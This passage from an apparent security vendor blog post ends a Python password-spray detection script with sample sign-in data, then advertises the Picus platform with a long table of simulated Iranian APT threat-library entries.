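    + [record(T0 + timedelta(seconds=60), "alice@corp.example", "203.0.113.10", BROWSER_UA,
              ERROR_INVALID_PASSWORD),
       record(T0 + timedelta(seconds=75), "alice@corp.example", "203.0.113.10", BROWSER_UA,
              ERROR_INVALID_PASSWORD),
       record(T0 + timedelta(seconds=90), "alice@corp.example", "203.0.113.10", BROWSER_UA, 0)]
)

if __name__ == "__main__":
    for a in detect_spray(parse_signins(SAMPLE_SIGNINS)):
        print(f"{a.ip} from {a.window_start.isoformat()}: {a.failures} failures over "
              f"{a.distinct_users} accounts; hits={a.successes_after_failure}; {a.indicators}")
```

The success_after_spray indicator is the one to route straight to incident response: it marks the account whose password the spray actually found.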

How Picus Helps Simulate Iranian APT Attacks

We also strongly suggest simulating Iranian APT attacks with the Picus Security Validation Platform to test the effectiveness of your security controls against sophisticated cyber attacks. You can also test your defenses against other APT attacks, such as Lazarus, Salt Typhoon, and Fancy Bear, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Iranian APT groups:

Threat ID | Threat Name | Attack Module
65765 | APT33 Threat Group Campaign | Windows Endpoint
91557 | APT33 Threat Group Campaign Malware Download Threat | Network Infiltration
36059 | APT33 Threat Group Campaign Malware Email Threat | Email Infiltration (Phishing)
68771 | APT33 Threat Group Campaign Backdoor Malware Download Threat | Network Infiltration
60939 | APT33 Threat Group Campaign Backdoor Malware Email Threat | Email Infiltration (Phishing)
51051 | APT39 Threat Group Campaign | Windows Endpoint
79993 | APT39 Threat Group Campaign Malware Download Threat | Network Infiltration
68174 | APT39 Threat Group Campaign Malware Email Threat | Email Infiltration (Phishing)
77590 | Magic Hound Threat Group Campaign Backdoor Malware Download Threat | Network Infiltration
22802 | Magic Hound Threat Group Campaign Backdoor Malware Email Threat | Email Infiltration (Phishing)
47283 | Magic Hound Threat Group Campaign Malware Download Threat | Network Infiltration
21013 | Magic Hound Threat Group Campaign Malware Email Threat | Email Infiltration (Phishing)
81502 | APT35 Threat Group Campaign | Windows Endpoint
45755 | OilRig Threat Group Campaign | Windows Endpoint
77637 | OilRig Threat Group Campaign Malware Downloader Download Threat | Network Infiltration
93267 | OilRig Threat Group Campaign Malware Downloader Email Threat | Email Infiltration (Phishing)
97270 | OilRig Threat Group Campaign Malware Download Threat - 1 | Network Infiltration
24424 | OilRig Threat Group Campaign Malware Email Threat - 1 | Email Infiltration (Phishing)
56842 | OilRig Threat Group Campaign Malware Download Threat - 2 | Network Infiltration
41691 | OilRig Threat Group Campaign Malware Email Threat - 2 | Email Infiltration (Phishing)
26905 | OilRig Threat Group Microsoft Office Malware Downloader Threat | Network Infiltration
73413 | APT34 Threat Group Campaign Malware Download | Network Infiltration
77013 | APT34 Threat Group Campaign Malware Email Threat | Email Infiltration (Phishing)
56301 | APT34 Threat Group Campaign Backdoor Malware Download Threat | Network Infiltration
99746 | APT34 Threat Group Campaign Backdoor Malware Email Threat | Email Infiltration (Phishing)
95850 | APT42 Threat Group Campaign | Windows Endpoint
21431 | APT42 Threat Group Campaign | macOS Endpoint
29805 | APT42 Threat Group Campaign Malware Download Threat | Network Infiltration
45434 | APT42 Threat Group Campaign Malware Email Threat | Email Infiltration (Phishing)
81428 | MuddyWater Threat Group Campaign | Windows Endpoint
68541 | MuddyWater Threat Group Campaign Downloader Download Threat | Network Infiltration
62904 | MuddyWater Threat Group Campaign Downloader Email Threat | Email Infiltration (Phishing)
76507 | MuddyWater Threat Group Campaign Malware Download Threat | Network Infiltration
97292 | MuddyWater Threat Group Campaign Malware Email Threat | Email Infiltration (Phishing)
82018 | MuddyWater Threat Group Campaign Malware Dropper Download Threat | Network Infiltration
31054 | MuddyWater Threat Group Campaign Malware Dropper Email Threat | Email Infiltration (Phishing)
68108 | MuddyWater Threat Group Campaign Malware Download Threat - 2 | Network Infiltration
28260 | MuddyWater Threat Group Campaign Malware Email Threat - 2 | Email Infiltration (Phishing)
98529 | MuddyWater Threat Group Campaign Backdoor Malware Download Threat | Network Infiltration
80189 | MuddyWater Threat Group Campaign Backdoor Malware Email Threat | Email Infiltration (Phishing)
68698 | MuddyWater Threat Group Campaign RAT Download Threat | Network Infiltration
43614 | MuddyWater Threat Group Campaign RAT Email Threat | Email Infiltration (Phishing)
56839 | Fox Kitten Threat Group Attack Campaign | Windows Endpoint
57995 | Fox Kitten Campaign Malware Download Threat | Network Infiltration
99935 | Fox Kitten Campaign Malware Email Threat | Email Infiltration (Phishing)
99659 | IMPERIAL KITTEN Threat Group Campaign Malware Download Threat | Network Infiltration
67076 | IMPERIAL KITTEN Threat Group Campaign Malware Email Threat | Email Infiltration (Phishing)
88923 | Tortoiseshell Threat Group Campaign Malware Downloader Download Threat |

Network Infiltration

57124

Tortoiseshell Threat Group Campaign Malware Downloader Email Threat

Email Infiltration (Phishing)

27832

Tortoiseshell Threat Group Campaign Backdoor Malware Download Threat

Network Infiltration

91919

Tortoiseshell Threat Group Campaign Backdoor Malware Email Threat

Email Infiltration (Phishing)

65932

Tortoiseshell Threat Group Campaign Malware Download Threat

Network Infiltration

58077

Tortoiseshell Threat Group Campaign Malware Email Threat

Email Infiltration (Phishing)

78689

Agrius Threat Group Campaign

Windows Endpoint

36690

HomeLand Justice Threat Group Campaign

Windows Endpoint

83741

HomeLand Justice Threat Group Campaign Wiper Download Threat

Network Infiltration

95340

HomeLand Justice Threat Group Campaign Wiper Email Threat

Email Infiltration (Phishing)

48961

HomeLand Justice Threat Group Campaign Malware Download Threat

Network Infiltration

52959

HomeLand Justice Threat Group Campaign Email Threat

Email Infiltration (Phishing)

52727

MosesStaff Threat Group Campaign Malware Download Threat

Network Infiltration

42503

MosesStaff Threat Group Campaign Malware Email Threat

Email Infiltration (Phishing)

56870

CopyKittens Threat Group Campaign RAT Download Threat

Network Infiltration

93990

CopyKittens Threat Group Campaign RAT Email Threat

Email Infiltration (Phishing)

70745

DarkHydrus Threat Group Campaign Malware Download Threat

Network Infiltration

57690

DarkHydrus Threat Group Campaign Malware Email Threat

Email Infiltration (Phishing)

81917

Hexane Threat Group Campaign Malware Download Threat

Network Infiltration

53049

Hexane Threat Group Campaign Malware Email Threat

Email Infiltration (Phishing)

78521

Infy Threat Group Campaign Malware Download Threat

Network Infiltration

71588

Infy Threat Group Campaign Malware Email Threat

Email Infiltration (Phishing)

24554

LeafMiner Malware Download Threat

Network Infiltration

38794

LeafMiner Malware Email Threat

Email Infiltration (Phishing)

58356

Lyceum Threat Group Campaign Malware Download Threat

Network Infiltration

41163

Lyceum Threat Group Campaign Malware Email Threat

Email Infiltration (Phishing)

28370

Nazar Threat Group Campaign Dropper Download Threat

Network Infiltration

50968

Nazar Threat Group Campaign Dropper Email Threat

Email Infiltration (Phishing)

55217

Rampant Kitten Campaign Infostealer Download Threat

Network Infiltration

29846

Rocket Kitten EK Download Threat

Network Infiltration

65129

Rocket Kitten EK Email Threat

Email Infiltration (Phishing)

23063

Boss Spider Threat Group Campaign Malware Download Threat

Network Infiltration

34107

Boss Spider Threat Group Campaign Malware Email Threat

Email Infiltration (Phishing)

34425

CyberAv3ngers Threat Group Campaign Malware Download Threat

Network Infiltration

97455

CyberAv3ngers Threat Group Campaign Malware Email Threat

Email Infiltration (Phishing)

56601

Ferocious Kitten Threat Group Campaign Malware Download Threat

Network Infiltration

41985

Ferocious Kitten Threat Group Campaign Malware Email Threat

Email Infiltration (Phishing)

38343

Madi Threat Group Campaign Malware Download Threat

Network Infiltration

49271

Madi Threat Group Campaign Malware Email Threat

Email Infiltration (Phishing)

47388

GreenCharlie Threat Group Campaign Malware Download Threat

Network Infiltration

37212

GreenCharlie Threat Group Campaign Malware Email Threat

Email Infiltration (Phishing)

70314

MalKamak Threat Group Campaign Malware Download

Network Infiltration

87458

MalKamak Threat Group Campaign Malware Email Threat

Email Infiltration (Phishing)

47076

xHunt Threat Group Campaign Malware Download Threat

Network Infiltration

98975

xHunt Threat Group Campaign Malware Email Threat

Email Infiltration (Phishing)

81719

UNC3890 Threat Group Campaign Malware Download Threat

Network Infiltration

70006

UNC3890 Threat Group Campaign Malware Email Threat

Email Infiltration (Phishing)

78657

DEV-1084 Threat Group Campaign Malware Download Threat

Network Infiltration

71991

DEV-1084 Threat Group Campaign Malware Email Threat

Email Infiltration (Phishing)

41982

Emennet Pasargad Threat Group Campaign Backdoor Malware Download Threat

Network Infiltration

35830

Emennet Pasargad Threat Group Campaign Backdoor Malware Email Threat

Email Infiltration (Phishing)

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
